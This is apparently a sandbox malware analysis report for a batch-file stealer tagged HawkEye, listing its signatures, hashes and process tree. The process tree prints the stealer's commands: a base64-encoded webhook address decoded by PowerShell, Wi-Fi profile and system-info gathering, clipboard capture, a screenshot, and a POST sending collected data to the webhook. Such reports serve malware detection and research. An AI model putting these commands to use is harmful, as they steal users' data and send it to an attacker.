Overview

overview

10

Static

static

1

ultimate_stealer.bat

windows7-x64

10

ultimate_stealer.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    31-12-2024 10:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ultimate_stealer.bat

  • Size

    1KB

  • MD5

    8b98f150c51dd4d1131853ce39e0404a

  • SHA1

    bc017b390021d8ad234bedfbb081fc0a3614c081

  • SHA256

    63f1a99e5ad0aa15bc12bfe7b20d1e9a9df3752b61ec9dbb0d1bb62fc8cfe6c4

  • SHA512

    a6768852c9501eaf8cd9b81dc35f863757e66d5fb532c8265f7d3ca2239c4f1fe0565ab9f37793af17fdbca642861cb986d4ac260ecb632834047b0cce8e750c

Score
10/10
hawkeyecollectiondiscoveryexecutionkeyloggerpersistenceprivilege_escalationspywarestealertrojan

Malware Config

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

    keyloggertrojanstealerspywarehawkeye
  • Hawkeye family
    hawkeye
  • Clipboard Data 1 TTPs 1 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

    collection
  • Deletes itself 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\ultimate_stealer.bat"
    1⤵
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:1528
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMxNTMzNTExODk0MDAxNjY0MC9TenlPRnVBcm15WUlPWk9vTkR5X0MzVHpSZlNvVXgzemFzQXN0UFdsNlE3OEs1U082aHprYnF4VFlQelI1a25ia2ozVA==')) > webhook.txt"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2572
    • C:\Windows\system32\systeminfo.exe
      systeminfo
      2⤵
      • Gathers system information
      PID:2364
    • C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      2⤵
      • Event Triggered Execution: Netsh Helper DLL
      • System Network Configuration Discovery: Wi-Fi Discovery
      PID:2824
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c findstr /C:"All User Profile" wifi_profiles.txt
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\Windows\system32\findstr.exe
        findstr /C:"All User Profile" wifi_profiles.txt
        3⤵
          PID:2664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Get-Clipboard
        2⤵
        • Clipboard Data
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait('{PRTSC}')"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:2628
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$File = 'data.txt'; $uri = ' ■h'; $body = @{content=(Get-Content -Path $File -Raw)}; Invoke-RestMethod -Uri $uri -Method Post -Body $body"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2200

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\webhook.txt
      Filesize

      248B

      MD5

      62660daa7eda586bd806a7ff553ee095

      SHA1

      d90d11b252c9637b7a3d6d04a968f9c7a1a34c50

      SHA256

      ebf5116a4ee0ed7d86dd2523d6063f6ed3b49841432781b940e8db31c7a8694c

      SHA512

      e2a2e77b2b66e5f9200da9ea4db3dfa65c9a8c0724b8c7d9bf1132c18690ba9a8e3e5278a597a3ebc1844c8cd6a1c42e82d4e56b6267f3a639dacf67965b18e2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\wifi_profiles.txt
      Filesize

      59B

      MD5

      409930721dbce1ee58227d109cca4570

      SHA1

      767f86ffec769d8415f07b4372a108cba1bf7221

      SHA256

      6b6dd8b11f84fb78e3e8cfaa7c5fca569d79402b9fc5861b00960b25607c911e

      SHA512

      4875187fce9545a92df636e384f92dcb403dfe80f3cad4a68e79329a1f42e12e9d04948f2a52b939638481da6d3e3b5f5096fe6dfd674ee53cca7c655ec03f17

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      541d80db556341acef83d99692243ece

      SHA1

      7d31fc36cf87f9ce90e63ac362e219ab6a2f6aae

      SHA256

      dbb6059fb63c1b94717928340f8f46df5dd77f951ba4a693a5e822faac827581

      SHA512

      7ec62aa15acc64ea61cae6ac29914787dc60e677f68f838000a604537b577c88bb08024209ce7fbfd9e5d312a8d723706c3b9bb2dc26b49384ac33d9bf59a02c

      Download Submit

    • memory/2572-7-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2572-9-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2572-10-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2572-11-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2572-13-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2572-6-0x0000000001D20000-0x0000000001D28000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2572-4-0x000007FEF540E000-0x000007FEF540F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2572-8-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2572-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2968-25-0x000000001B580000-0x000000001B862000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2968-26-0x0000000002070000-0x0000000002078000-memory.dmp

      Filesize

      32KB

      Download